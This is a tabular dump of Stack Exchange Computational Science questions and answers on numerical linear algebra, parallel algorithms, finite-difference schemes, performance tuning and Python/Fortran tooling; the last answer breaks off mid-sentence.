source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
1,329 | If I have a square invertible matrix and I take its determinant, and I find that $\det(A) \approx 0$, does this imply that the matrix is poorly conditioned? Is the converse also true? Does an ill-conditioned matrix have a nearly zero determinant? Here is something I tried in Octave: a = rand(4,4);
det(a) %0.008
cond(a)%125
a(:,4) = 1*a(:,1) + 2*a(:,2) = 0.000000001*ones(4,1);
det(a)%1.8E-11
cond(a)%3.46E10 | It's the largeness of the condition number $\kappa(\mathbf A)$ that measures the nearness to singularity, not the tininess of the determinant. For instance, the diagonal matrix $10^{-50} \mathbf I$ has tiny determinant, but is well-conditioned. On the flip side, consider the following family of square upper triangular matrices, due to Alexander Ostrowski (and also studied by Jim Wilkinson): $$\mathbf U=\begin{pmatrix}1&2&\cdots&2\\&1&\ddots&\vdots\\&&\ddots&2\\&&&1\end{pmatrix}$$ The determinant of the $n\times n$ matrix $\mathbf U$ is always $1$, but the ratio of the largest to the smallest singular value (i.e. the 2-norm condition number $\kappa_2(\mathbf U)=\dfrac{\sigma_1}{\sigma_n}$) was shown by Ostrowski to be equal to $\cot^2\dfrac{\pi}{4n}$, which can be seen to increase for increasing $n$. | {
"source": [
"https://scicomp.stackexchange.com/questions/1329",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/529/"
]
} |
1,391 | Are there any famous problems/algorithms in scientific computing that cannot be sped up by parallelisation? It seems to me whilst reading books on CUDA that most things can be. | The central issue is the length of the critical path $C$ relative to the total amount of computation $T$. If $C$ is proportional to $T$, then parallelism offers at best a constant speed-up. If $C$ is asymptotically smaller than $T$, there is room for more parallelism as the problem size increases. For algorithms in which $T$ is polynomial in the input size $N$, the best case is $C \sim \log T$ because very few useful quantities can be computed in less than logarithmic time. Examples $C = T$ for a tridiagonal solve using the standard algorithm. Every operation is dependent on the previous operation completing, so there is no opportunity for parallelism. Tridiagonal problems can be solved in logarithmic time on a parallel computer using a nested dissection direct solve, multilevel domain decomposition, or multigrid with basis functions constructed using harmonic extension (these three algorithms are distinct in multiple dimensions, but can exactly coincide in 1D). A dense lower-triangular solve with an $m\times m$ matrix has $T = N = \mathcal O(m^2)$, but the critical path is only $C = m = \sqrt T$, so some parallelism can be beneficial. Multigrid and FMM both have $T = N$, with a critical path of length $C = \log T$. Explicit wave propagation for a time $\tau$ on a regular mesh of the domain $(0,1)^d$ requires $k = \tau / \Delta t \sim \tau N^{1/d}$ time steps (for stability), therefore the critical path is at least $C = k$. The total amount of work is $T = k N = \tau N^{(d+1)/d}$. The maximum useful number of processors is $P = T/C = N$, the remaining factor $N^{1/d}$ cannot be recovered by increased parallelism. Formal complexity The NC complexity class characterizes those problems that can be solved efficiently in parallel (i.e., in polylogarithmic time). It is unknown whether $NC = P$, but it is widely hypothesized to be false. If this is indeed the case, then P-complete characterizes those problems that are "inherently sequential" and cannot be sped up significantly by parallelism. | {
"source": [
"https://scicomp.stackexchange.com/questions/1391",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1017/"
]
} |
1,658 | Is there a way, using some established Python package (e.g. SciPy) to define my own probability density function (without any prior data, just $f(x) = a x + b$), so I can then make calculations with it (such as obtaining the variance of the continuous random variable)? Of course I could take, say, SymPy or Sage, create a symbolic function and do the operations, but I'm wondering whether instead of doing all this work myself I can make use of an already-implemented package. | You have to subclass the rv_continuous class in scipy.stats import scipy.stats as st
class my_pdf(st.rv_continuous):
def _pdf(self,x):
return 3*x**2 # Normalized over its range, in this case [0,1]
my_cv = my_pdf(a=0, b=1, name='my_pdf') now my_cv is a continuous random variable with the given PDF and range [0,1] Note that in this example my_pdf and my_cv are arbitrary names (that could have been anything), but _pdf is not arbitrary; it and _cdf are methods in st.rv_continuous one of which must be overwritten in order for the subclassing to work. | {
"source": [
"https://scicomp.stackexchange.com/questions/1658",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/782/"
]
} |
1,960 | What would be a good finite difference discretization for the following equation: $\frac{\partial \rho}{\partial t} + \nabla \cdot \left(\rho u\right)=0$? We can take the 1D case: $\frac{\partial \rho}{\partial t} + \frac{d}{dx}\left(\rho u\right)=0$ For some reason all schemes I can find is for the formulation in Lagrangian coordinates.
I came up with this scheme for the time being (disregard the j index): $ \frac{\rho^{n+1}_{i,j}-\rho^{n}_{i,j}}{\tau} + \frac{1}{h_x}\left(\frac{\rho^{n+1}_{i+1,j}+\rho^{n+1}_{i,j}}{2}u^{n}_{_xi+1/2,j}- \frac{\rho^{n+1}_{i,j}+\rho^{n+1}_{i-1,j}}{2}u^{n}_{_xi-1/2}\right)=0$ But seems to be really unstable or have some horrible stability condition. Is that so? The velocity is actually calculated through the darcy law $u=-\frac{k}{\mu}\nabla p$. Plus we have the equation of state. The full system consists also of an energy equation and the equation of state for the ideal gas. The velocities can turn negative . | You are looking at the mass conservation equation: $\dfrac{dm}{dt}=0$ When considering mass evolution per unit volume, this boils down to the density advection equation in flux form: $\dfrac{\partial \rho}{\partial t} = -\nabla \cdot (\rho u)$ Good thing about this is that it is just the advection equation of an arbitrary scalar field (in our case, this happens to be density $\rho$) and it is (relatively) easy to solve, provided adequate time and space differencing schemes, and initial and boundary conditions. When designing a finite differencing scheme, we worry about convergence, stability and accuracy. A scheme is converging if $\dfrac{\Delta A}{\Delta t} \rightarrow \dfrac{\partial A}{\partial t}$ when $\Delta t \rightarrow 0$. Stability of the schemes ensures that the quantity $A$ remains finite when $t \rightarrow \infty$. Formal accuracy of the scheme tells where the truncation error in the Taylor expansion series of the partial derivative lies. Look into a CFD textbook for more details on these fundamental properties of a differencing scheme. Now, the simplest approach is to go straight to 1st order upstream differencing. This scheme is positive-definite, conservative and computationally efficient. The first two properties are especially important when we model the evolution of a quantity which is always positive (i.e. mass or density). For simplicity, let's look at 1-D case: $\dfrac{\partial \rho}{\partial t} = -\dfrac{\partial(\rho u)}{\partial x}$ It is convenient now to define the flux $\Phi = \rho u$, so that: $\dfrac{\partial(\rho u)}{\partial x} = \dfrac{\partial \Phi}{\partial x} \approx \dfrac{\Delta \Phi}{\Delta x} \approx \dfrac{\Phi_{i+1/2}-\Phi_{i-1/2}}{\Delta x}$ Here's a schematic of what we are simulating: u u
| --> --> |
| rho | rho | rho |
x-----o-----x-----o-----x-----o-----x
i-1 i-1/2 i i+1/2 i+1 We are evaluating the evolution of $\rho$ at cell $i$. The net gain or loss comes from the difference of what comes in, $\Phi_{i-1/2}$ and what goes out, $\Phi_{i+1/2}$. This is where we start to diverge from Paul's answer. In true conservative upstream differencing, the quantity at the cell center is being carried by velocity at its cell edge, in the direction of its motion. In other words, if you imagine you are the advected quantity and you are sitting at the cell center, you are being carried into the cell in front of you by the velocity at the cell edge. Evaluating the flux at the cell edge as a product of density and velocity, both at the cell edge, is not correct and does not conserve the advected quantity. Incoming and outgoing fluxes are evaluated as: $\Phi_{i+1/2} = \dfrac{u_{i+1/2}+|u_{i+1/2}|}{2}\rho_{i}
+ \dfrac{u_{i+1/2}-|u_{i+1/2}|}{2}\rho_{i+1}$ $\Phi_{i-1/2} = \dfrac{u_{i-1/2}+|u_{i-1/2}|}{2}\rho_{i-1}
+ \dfrac{u_{i-1/2}-|u_{i-1/2}|}{2}\rho_{i}$ The above treatment of flux differencing ensures upstream-definiteness. In other words, it adjusts the differencing direction according to the sign of velocity. The Courant-Friedrichs-Lewy (CFL) stability criterion, when doing time differencing with simple first order, forward Euler differencing is given as: $\mu = \dfrac{u\Delta t}{\Delta x} \leq 1$ Note that in 2 dimensions, the CFL stability criterion is more strict: $\mu = \dfrac{c\Delta t}{\Delta x} \leq \dfrac{1}{\sqrt{2}}$ where $c$ is velocity magnitude, $\sqrt{u^{2}+v^{2}}$. Some things to consider. This scheme may or may not be appropriate for your application depending on what kind of process you are simulating. This scheme is highly diffusive, and is appropriate for very smooth flows without sharp gradients. It is also more diffusive for shorter time steps. In the 1-D case, you will obtain an almost exact solution if the gradients are very small, and if $\mu = 1$. In the 2-D case, this is not possible, and diffusion is anisotropic. If your physical system considers shock waves or high gradients of other sort, you should look into upstream differencing of higher order (e.g. 3rd or 5th order). Also, it may be worthwhile looking into the Flux Corrected Transport family of schemes (Zalesak, 1979, JCP); anti-diffusion correction for the above scheme by Smolarkiewicz (1984, JCP); MPDATA family of schemes by Smolarkiewicz (1998, JCP). For time differencing, 1st order forward Euler differencing may be satisfactory for your needs. Otherwise, look into higher-order methods such as Runge-Kutta (iterative), or Adams-Bashforth and Adams-Moulton (multi-level). It would be worthwhile looking into some CFD graduate-level textbook for a summary of above mentioned schemes and many more. | {
"source": [
"https://scicomp.stackexchange.com/questions/1960",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1088/"
]
} |
2,168 | One of the major issues that we have to deal with in molecular simulations is the calculation of distance-dependent forces. If we can restrict the force and distance functions to have even powers of the separation distance $r$, then we can just compute the square of the distance $r^2 = {\bf r \cdot r}$ and not have to worry about $r$. If there are odd powers, however, then we need to deal with $r = \sqrt{r^2}$. My question is: how expensive is computing $\sqrt{x}$ as implemented in the libraries of common languages (C/C++, Fortran, Python), etc.? Is there really a lot of performance improvements to be had by hand-tuning the code for specific architectures? | As an extension to moyner's answer , the on-chip sqrt is usually an rsqrt , i.e. a reciprocal square root that computes $a \rightarrow 1/\sqrt{a}$. So if in your code you're only going to use $1/r$ (if you're doing molecular dynamics, you are), you can compute r = rsqrt(r2) directly and save yourself the division. The reason why rsqrt is computed instead of sqrt is that its Newton iteration has no divisions, only additions and multiplications. As a side-note, divisions are also computed iteratively and are almost just as slow as rsqrt in hardware. If you're looking for efficiency, you're better off trying to remove superfluous divisions. Some more modern architectures such as IBM's POWER architectures do not provide rsqrt per-se, but an estimate accurate to a few bits, e.g. FRSQRTE . When a user calls rsqrt , this generates an estimate and then one or two (as many as required) iterations of Newton's or Goldschmidt's algorithm using regular multiplications and additions. The advantage of this approach is that the iteration steps may be pipelined and interleaved with other instructions without blocking the FPU (for a very nice overview of this concept, albeit on older architectures, see Rolf Strebel's PhD Thesis ). For interaction potentials, the sqrt operation can be avoided entirely by using a polynomial interpolant of the potential function, but my own work (implemented in mdcore ) in this area show that, at least on x86-type architectures, the sqrt instruction is fast enough. Update Since this answer seems to be getting quite a bit of attention, I would also like to address the second part of your question, i.e. is it really worth it to try to improve/eliminate basic operations such as sqrt ? In the context of Molecular Dynamics simulations, or any particle-based simulation with cutoff-limited interactions, there is a lot to be gained from better algorithms for neighbour finding. If you're using Cell lists , or anything similar, to find neighbours or create a Verlet list , you will be computing a large number of spurious pairwise distances. In the naive case, only 16% of particle pairs inspected will actually be within the cutoff distance of each other. Although no interaction is computed for such pairs, accessing the particle data and computing the spurious pairwise distance carries a large cost. My own work in this area ( here , here , and here ), as well as that of others (e.g. here ), show how these spurious computations can be avoided. These neighbour-finding algorithms even out-perform Verlet lists, as described here . The point I want to emphasize is that although there may be some improvements to gain from better knowing/exploiting the underlying hardware architecture, there are also potentially larger gains to be had in re-thinking the higher-level algorithms. | {
"source": [
"https://scicomp.stackexchange.com/questions/2168",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/348/"
]
} |
2,173 | I work in computational science, and as a result, I spend a non-trivial amount of my time trying to increase the scientific throughput of many codes, as well as understanding the efficiency of these codes. Let's assume I have evaluated the performance vs. readability/reusability/maintainability tradeoff of the software I am working on, and I have decided that it's time to go for performance. Let's also assume that I know I don't have a better algorithm for my problem (in terms of flop/s and memory bandwidth). You can also assume my code base is in a low-level language like C, C++, or Fortran. Finally, let's assume that there is no parallelism to be had in the code, or that we're only interested in performance on a single core. What are the most important things to try first? How do I know how much performance I can get? | First of all, as skillman and Dan have pointed out, profiling is essential. I personally use Intel's VTune Amplifier on Linux as it gives me a very fine-grained overview of where time was spent doing what. If you're not going to change the algorithm (i.e. if there will be no major changes that will turn all your optimizations obsolete), then I'd suggest looking for some common implementation details that can make a big difference: Memory locality : is data that is read/used together also stored together, or are you picking up bits and pieces here and there? Memory alignment : are your doubles actually aligned to 4 bytes? How did you pack your structs ? To be pedantic, use posix_memalign instead of malloc . Cache efficiency : Locality takes care of most cache efficiency issues, but if you have some small data structures that you read/write often, it helps if they are an integer multiple or fraction of a cache line (usually 64 bytes). It also helps if your data is aligned to the size of a cache line. This can drastically reduce the number of reads necessary to load a piece of data. Vectorization : No, don't go mental with hand-coded assembler. gcc offers vector types that get translated to SSE/AltiVec/whatever instructions automagically. Instruction-Level Parallelism : The bastard son of vectorization. If some often-repeated computation does not vectorize well, you can try accumulating input values and computing several values at once. It's kind of like loop unrolling. What you're exploiting here is that your CPU will usually have more than one floating-point unit per core. Arithmetic precision : Do you really need double-precision arithmetic in everything you do? E.g. if you're computing a correction in a Newton iteration, you usually don't need all the digits you're computing. For a more in-depth discussion, see this paper. Some of these tricks are used in the daxpy_cvec this thread. Having said that, if you're using Fortran (not a low-level language in my books), you will have very little control over most of these "tricks". If you're running on some dedicated hardware, e.g. a cluster you use for all your production runs, you may also want to read-up on the specifics of the CPUs used. Not that you should write stuff in assembler directly for that architecture, but it might inspire you to find some other optimizations that you may have missed. Knowing about a feature is a necessary first step to writing code that can exploit it. Update It's been a while since I wrote this and I hadn't noticed that it had become such a popular answer. For this reason, I'd like to add one important point: Talk to your local Computer Scientist : Wouldn't it be cool if there were a discipline which dealt exclusively with making algorithms and/or computations more efficient/elegant/parallel, and we could all go ask them for advice? Well, good news, that discipline exists: Computer Science. Chances are, your institution even has a whole department dedicated to it. Talk to these guys. I'm sure to a number of non-Computer Scientists this will bring back memories of frustrating discussions with said discipline that led to nothing, or memories of other people's anecdotes thereof. Don't be discouraged. Interdisciplinary collaboration is a tricky thing, and it takes a bit of work, but the rewards can be massive. In my experience, as a Computer Scientist (CS), the trick is in getting both the expectations and the communication right. Expectation -wise, a CS will only help you if he/she thinks your problem is interesting. This pretty much excludes trying to optimize/vectorize/parallelize a piece of code you've written, but not really commented, for a problem they don't understand. CSs are usually more interested in the underlying problem, e.g. the algorithms used to solve it. Don't give them your solution , give them your problem . Also, be prepared for the CS to say " this problem has already been solved ", and just give you a reference to a paper. A word of advice: Read that paper and, if it really does apply to your problem, implement whatever algorithm it suggests. This is not a CS being smug, it's a CS that just helped you. Don't be offended, remember: If the problem is not computationally interesting, i.e. it has already been solved and the solution shown to be optimal, they won't work on it, much less code it up for you. Communication -wise, remember that most CSs are not experts in your field, and explain the problem in terms of what you are doing, as opposed to how and why . We usually really don't care about the why , and the how is, well, what we do best. For example, I'm currently working with a bunch of Computational Cosmologists on writing a better version of their simulation code, based on SPH and Multipoles . It took about three meetings to stop talking in terms of dark matter and galaxy haloes (huh?) and to drill down to the core of the computation, i.e. that they need to find all the neighbours within a given radius of each particle, compute some quantity over them, and then run over all said neighbours again and apply that quantity in some other computation. Then move the particles, or at least some of them, and do it all again. You see, while the former may be incredibly interesting (it is!), the latter is what I need to understand to start thinking about algorithms. But I'm diverging from the main point: If you're really interested in making your computation fast, and you're not a Computer Scientist yourself, go talk to one. | {
"source": [
"https://scicomp.stackexchange.com/questions/2173",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/9/"
]
} |
2,244 | I have matrices $A$ and $G$. $A$ is sparse and is $n\times n$ with $n$ very large (can be on the order of several million.) $G$ is an $n\times m$ tall matrix with $m$ rather small ($1 \lt m \lt 1000$) and each column can only have a single $1$ entry with the rest being $0$'s, such that $G^TG = I$. $A$ is huge, so it is really tough to invert, and I can solve a linear system such as $Ax = b$ iteratively using a Krylov subspace method such as $\mathrm{BiCGStab}(l)$, but I do not have $A^{-1}$ explicitly. I want to solve a system of the form: $(G^TA^{-1}G)x = b$, where $x$ and $b$ are $m$ length vectors. One way to do it is to use an iterative algorithm within an iterative algorithm to solve for $A^{-1}$ for each iteration of the outer iterative algorithm. This would be extremely computationally expensive, however. I was wondering if there is a computationally easier way to go about solving this problem. | Introduce the vector $y:=-A^{-1}Gx$ and solve the large coupled system $Ay+Gx=0$, $G^Ty=-b$ for $(y,x)$ simultaneously, using an iterative method. If $A$ is symmetric (as seems likely though you don't state it explicitly) then the system is symmetric (but indefinite, though quasidefinite if $A$ is positive definite), which might help you to choose an appropriate method. (relevant keywords: KKT matrix, quasidefinite matrix). Edit: As $A$ is complex symmetric, so is the augmented matrix, but there is no quasidefiniteness. You can however use the $Ax$ routine to compute $A^*x=\overline{A\overline x}$; therefore you could adapt a method such as QMR ftp://ftp.math.ucla.edu/pub/camreport/cam92-19.pdf (designed for real systems, but you can easily rewrite it for complex systems, using the adjoint in place of the transpose) to solve your problem. Edit2: Actually, the (0,1)-structure of $G$ means that you can eliminate $x$ amd the components of $G^Ty$ symbolically, thus ending up with a smaller system to solve. This means messing with the structure of $A$, and pays only when $A$ is given explicitly in sparse format rather than as a linear operator. | {
"source": [
"https://scicomp.stackexchange.com/questions/2244",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1480/"
]
} |
2,469 | Related question: State of the Mac OS in Scientific Computing and HPC A significant number of software packages in computational science are written in Fortran, and Fortran isn't going away. A Fortran compiler is also required to build other software packages (one notable example being SciPy ). However, Mac OS X does not include a Fortran compiler. How should I install a Fortran compiler on my machine? | Pick your poison. I recommend using Homebrew. I have tried all of these methods except for "Fink" and "Other Methods". Originally, I preferred MacPorts when I wrote this answer. In the two years since, Homebrew has grown a lot as a project and has proved more maintainable than MacPorts, which can require a lot of PATH hacking. Installing a version that matches system compilers If you want the version of gfortran to match the versions of gcc, g++, etc. installed on your machine, download the appropriate version of gfortran from here . The R developers and SciPy developers recommend this method. Advantages : Matches versions of compilers installed with XCode or with Kenneth Reitz's installer ; unlikely to interfere with OS upgrades; coexists nicely with MacPorts (and probably Fink and Homebrew) because it installs to /usr/bin . Doesn't clobber existing compilers. Don't need to edit PATH . Disadvantages : Compiler stack will be really old. (GCC 4.2.1 is the latest Apple compiler; it was released in 2007.) Installs to /usr/bin . Installing a precompiled, up-to-date binary from HPC Mac OS X HPC Mac OS X has binaries for the latest release of GCC (at the time of this writing, 4.8.0 (experimental)), as well as g77 binaries, and an f2c-based compiler. The PETSc developers recommend this method on their FAQ . Advantages : With the right command, installs in /usr/local ; up-to-date. Doesn't clobber existing system compilers, or the approach above. Won't interfere with OS upgrades. Disadvantages : Need to edit PATH . No easy way to switch between versions. (You could modify the PATH, delete the compiler install, or kludge around it.) Will clobber other methods of installing compilers in /usr/local because compiler binaries are simply named 'gcc', 'g++', etc. (without a version number, and without any symlinks). Use MacPorts MacPorts has a number of versions of compilers available for use. Advantages : Installs in /opt/local ; port select can be used to switch among compiler versions (including system compilers). Won't interfere with OS upgrades. Disadvantages : Installing ports tends to require an entire "software ecosystem". Compilers don't include debugging symbols, which can pose a problem when using a debugger, or installing PETSc. ( Sean Farley proposes some workarounds.) Also requires changing PATH . Could interfere with Homebrew and Fink installs. (See this post on SuperUser .) Use Homebrew Homebrew can also be used to install a Fortran compiler. Advantages : Easy to use package manager; installs the same Fortran compiler as in "Installing a version that matches system compilers". Only install what you need (in contrast to MacPorts). Could install a newer GCC (4.7.0) stack using the alternate repository homebrew-dupes. Disadvantages : Inherits all the disadvantages from "Installing a version that matches system compilers". May need to follow the Homebrew paradigm when installing other (non-Homebrew) software to /usr/local to avoid messing anything up. Could interfere with MacPorts and Fink installs. (See this post on SuperUser .) Need to change PATH . Installs could depend on system libraries, meaning that dependencies for Homebrew packages could break on an OS upgrade. (See this article .) I wouldn't expect there to be system library dependencies when installing gfortran, but there could be such dependencies when installing other Homebrew packages. Use Fink In theory, you can use Fink to install gfortran. I haven't used it, and I don't know anyone who has (and was willing to say something positive). Other methods Other binaries and links are listed on the GFortran wiki . Some of the links are already listed above. The remaining installation methods may or may not conflict with those described above; use at your own risk. | {
"source": [
"https://scicomp.stackexchange.com/questions/2469",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/276/"
]
} |
2,493 | Background: I think I might want to port some code that calculates matrix exponential-vector products using a Krylov subspace method from MATLAB to Python. (Specifically, Jitse Niesen's expmvp function, which uses an algorithm described in this paper .) However, I know that unless I make heavy use of functions from modules derived from compiled libraries (i.e., I only use raw Python, and not many built-in functions), then it could be quite slow. Question: What tools or approaches are available to help me speed up code I write in Python for performance? In particular, I'm interested in tools that automate the process as much as possible, though general approaches are also welcome. Note: I have an older version of Jitse's algorithm, and haven't used it in a while. It could be very easy to make this code fast, but I felt like it would make a good concrete example, and it is related to my own research. Debating my approach for implementing this particular algorithm in Python is another question entirely. | I'm going to break up my answer into three parts. Profiling, speeding up the python code via c, and speeding up python via python. It is my view that Python has some of the best tools for looking at what your code's performance is then drilling down to the actual bottle necks. Speeding up code without profiling is about like trying to kill a deer with an uzi. If you are really only interested in mat-vec products, I would recommend scipy.sparse . Python tools for profiling profile and cProfile modules : These modules will give you your standard run time analysis and function call stack. It is pretty nice to save their statistics and using the pstats module you can look at the data in a number of ways. kernprof : this tool puts together many routines for doing things like line by line code timing memory_profiler : this tool produces line by line memory foot print of your code. IPython timers : The timeit function is quite nice for seeing the differences in functions in a quick interactive way. Speeding up Python Cython : cython is the quickest way to take a few functions in python and get faster code. You can decorate the function with the cython variant of python and it generates c code. This is very maintable and can also link to other hand written code in c/c++/fortran quite easily. It is by far the preferred tool today. ctypes : ctypes will allow you to write your functions in c and then wrap them quickly with its simple decoration of the code. It handles all the pain of casting from PyObjects and managing the gil to call the c function. Other approaches exist for writing your code in C but they are all somewhat more for taking a C/C++ library and wrapping it in Python. Python-only approaches If you want to stay inside Python mostly, my advice is to figure out what data you are using and picking correct data types for implementing your algorithms. It has been my experience that you will usually get much farther by optimizing your data structures then any low level c hack. For example: numpy : a contingous array very fast for strided operations of arrays numexpr : a numpy array expression optimizer. It allows for multithreading numpy array expressions and also gets rid of the numerous temporaries numpy makes because of restrictions of the Python interpreter. blist : a b-tree implementation of a list, very fast for inserting, indexing, and moving the internal nodes of a list pandas : data frames (or tables) very fast analytics on the arrays. pytables : fast structured hierarchical tables (like hdf5), especially good for out of core calculations and queries to large data. | {
"source": [
"https://scicomp.stackexchange.com/questions/2493",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/276/"
]
} |
2,748 | Generally speaking, I've heard numerical analysts utter the opinion that "Of course, mathematically speaking, time is just another dimension, but still, time is special" How to justify this? In what sense is time special for computational science? Moreover, why do we so often prefer to use finite differences, (leading to "time-stepping"), for the time dimension, while we apply finite differences, finite elements, spectral methods, ..., for the spatial dimensions? One possible reason is that we tend to have an IVP in the time dimension, and a BVP in the spatial dimensions. But I don't think this fully justifies it. | Causality indicates that information only flows forward in time, and algorithms should be designed to exploit this fact. Time stepping schemes do this, whereas global-in-time spectral methods or other ideas do not. The question is of course why everyone insists on exploiting this fact -- but that's easy to understand: if your spatial problem already has a million unknowns and you need to do 1000 time steps, then on a typical machine today you have enough resources to solve the spatial problem by itself one timestep after the other, but you don't have enough resources to deal with a coupled problem of $10^9$ unknowns. The situation is really not very different from what you have with spatial discretizations of transport phenomena either. Sure, you can discretize a pure 1d advection equation using a globally coupled approach. But if you care about efficiency, then the by far best approach is to use a downstream sweep that carries information from the inflow to the outflow part of the domain. That's exactly what time stepping schemes do in time. | {
"source": [
"https://scicomp.stackexchange.com/questions/2748",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1740/"
]
} |
2,868 | The Journal of Computational Physics has been an important outlet for computational science in the past, and I have published there before. For the benefit of those (like me) who have signed the Elsevier boycott , what non-Elsevier journals would be appropriate places to publish articles that could have been submitted to the Journal of Computational Physics? A good alternative should: Overlap (at least partially) in subject matter with JCP Have a good reputation Not be published by Elsevier Note : When I say "reputation", I don't mean impact factor. Please see this article that demonstrates that the two are not well-correlated in this field. | The SIAM Journals, especially SISC (Scientific Computing) and MMS (Multiscale Modeling and Simulation) are obvious established and high-quality choices. | {
"source": [
"https://scicomp.stackexchange.com/questions/2868",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/123/"
]
} |
2,987 | I don't want to deal with virtualenv for a local Python installation, I just want to install a few packages locally without dealing with the PYTHONPATH environment variable, how do I do that? | Python (as of 2.6 and 3.0 ) now searches in the ~/.local directory for local installs, which do not require administrative privileges to install, so you just need to point your installer to that directory. If you have already downloaded the package foo and would like to install it manually, type: cd path/to/foo
python setup.py install --user If you are using easy_install and would like the package downloaded and installed: easy_install --prefix=$HOME/.local/ foo Update by RafiK pip install --user foo The following answer is provided for historical purposes: It's a little more work if you are using pip to download and install: pip install --install-option="--prefix=$HOME/.local" foo | {
"source": [
"https://scicomp.stackexchange.com/questions/2987",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/9/"
]
} |
3,159 | Is it a good idea to use vector<vector<double>> (using std) to form a matrix class for high performance scientific computing code? If the answer is no. Why? Thanks | It's a bad idea because vector needs to allocate as many objects in space as there are rows in your matrix. Allocation is expensive, but primarily it is a bad idea because the data of your matrix now exists in a number of arrays scattered around memory, rather than all in one place where the processor cache can easily access it. It's also a wasteful storage format: std::vector stores two pointers, one to the beginning of the array and one to the end because the length of the array is flexible. On the other hand, for this to be a proper matrix, the lengths of all rows must be the same and so it would be sufficient to store the number of columns only once, rather than letting each row store its length independently. | {
"source": [
"https://scicomp.stackexchange.com/questions/3159",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1965/"
]
} |
3,262 | To my knowledge, there are 4 ways to solving a system of linear equations (correct me if there are more): If the system matrix is a full-rank square matrix, you can use Cramer’s Rule; Compute the inverse or the pseudoinverse of the system matrix; Use matrix decomposition methods (Gaussian or Gauss-Jordan elimination is considered as LU decomposition); Use iterative methods, such as the conjugate gradient method. In fact, you almost never want to solving the equations by using Cramer's rule or computing the inverse or pseudoinverse, especially for high dimensional matrices, so the first question is when to use decomposition methods and iterative methods, respectively. I guess it depends on the size and properties of the system matrix. The second question is, to your knowledge, what kind of decomposition methods or iterative methods are most suitable for certain system matrix in terms of numerical stability and efficiency. For example, the conjugate gradient method is used to solve equations where the matrix is symmetric and positive definite, although it can also be applied to any linear equations by converting $\mathbf{A}x=b$ to $\mathbf{A}^{\rm T}\mathbf{A}x=\mathbf{A}^{\rm T}b$. Also for positive definite matrix, you can use Cholesky decomposition method to seek the solution. But I don't know when to choose the CG method and when to choose Cholesky decomposition. My feeling is we'd better use CG method for large matrices. For rectangular matrices, we can either use QR decomposition or SVD, but again I don't know how to choose one of them. For other matrices, I don't now how to choose the appropriate solver, such Hermitian/symmetric matrices, sparse matrices, band matrices etc. | Your question is a bit like asking for which screwdriver to choose depending on the drive (slot, Phillips, Torx, ...): Besides there being too many , the choice also depends on whether you want to just tighten one screw or assemble a whole set of library shelves. Nevertheless, in partial answer to your question, here are some of the issues you should keep in mind when choosing a method for solving the linear system $Ax=b$.
I will also restrict myself to invertible matrices; the cases of over- or underdetermined systems are a different matter and should really be separate questions. As you rightly noted, option 1 and 2 are right out: Computing and applying the inverse matrix is a tremendously bad idea, since it is much more expensive and often numerically less stable than applying one of the other algorithms. That leaves you with the choice between direct and iterative methods. The first thing to consider is not the matrix $A$, but what you expect from the numerical solution $\tilde x$: How accurate does it have to be? Does $\tilde x$ have to solve the system up to machine precision, or are you satisfied with $\tilde x$ satisfying (say) $\|\tilde x - x^*\| < 10^{-3}$, where $x^*$ is the exact solution? How fast do you need it? The only relevant metric here is clock time on your machine - a method which scales perfectly on a huge cluster might not be the best choice if you don't have one of those, but you do have one of those shiny new Tesla cards. As there's no such thing as a free lunch, you usually have to decide on a trade-off between the two. After that, you start looking at the matrix $A$ (and your hardware) to decide on a good method (or rather, the method for which you can find a good implementation). (Note how I avoided writing "best" here...) The most relevant properties here are The structure : Is $A$ symmetric? Is it dense or sparse? Banded? The eigenvalues : Are they all positive (i.e., is $A$ positive definite)? Are they clustered? Do some of them have very small or very large magnitude? With this in mind, you then have to trawl the (huge) literature and evaluate the different methods you find for your specific problem. Here are some general remarks: If you really need (close to) machine precision for your solution, or if your matrix is small (say, up to $1000$ rows), it is hard to beat direct methods, especially for dense systems (since in this case, every matrix multiplication will be $\mathcal{O}(n^2)$, and if you need a lot of iterations, this might not be far from the $\mathcal{O}(n^3)$ a direct method needs). Also, LU decomposition (with pivoting) works for any invertible matrix, as opposed to most iterative methods. (Of course, if $A$ is symmetric and positive definite, you'd use Cholesky.) This is also true for (large) sparse matrices if you don't run into memory problems: Sparse matrices in general do not have a sparse LU decomposition, and if the factors do not fit into (fast) memory, these methods becomes unusable. In addition, direct methods have been around for a long time, and very high quality software exists (e.g., UMFPACK, MUMPS, SuperLU for sparse matrices) which can automatically exploit the band structure of $A$. If you need less accuracy, or cannot use direct methods, choose a Krylov method (e.g., CG if $A$ is symmetric positive definite, GMRES or BiCGStab if not) instead of a stationary method (such as Jacobi or Gauss-Seidel): These usually work much better, since their convergence is not determined by the spectral radius of $A$ but by (the square root) of the condition number and does not depend on the structure of the matrix. However, to get really good performance from a Krylov method, you need to choose a good preconditioner for your matrix - and that is more a craft than a science... If you repeatedly need to solve linear systems with the same matrix and different right hand sides, direct methods can still be faster than iterative methods since you only need to compute the decomposition once. (This assumes sequential solution; if you have all the right hand sides at the same time, you can use block Krylov methods.) Of course, these are just very rough guidelines: For any of the above statements, there likely exists a matrix for which the converse is true... Since you asked for references in the comments, here are some textbooks and review papers to get you started. (Neither of these - nor the set - is comprehensive; this question is much too broad, and depends too much on your particular problem.) Golub, van Loan: Matrix Computations (still the classical reference on matrix algorithms; the much expanded fourth edition now also discusses sparse matrices and has Matlab code in place of Fortran as well as an extensive bibliography) Davis: Direct Methods for Sparse Linear Systems (a good introduction on decomposition methods for sparse matrices) Duff: Direct Methods (review paper; more details on modern "multifrontal" direct methods for sparse matrices) Saad: Iterative 